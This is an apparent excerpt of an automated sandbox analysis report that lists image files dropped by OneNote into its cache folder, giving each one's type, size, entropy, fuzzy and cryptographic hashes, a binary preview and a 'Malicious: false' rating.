MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000061.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000063.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000065.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000066.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000067.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000068.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000069.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
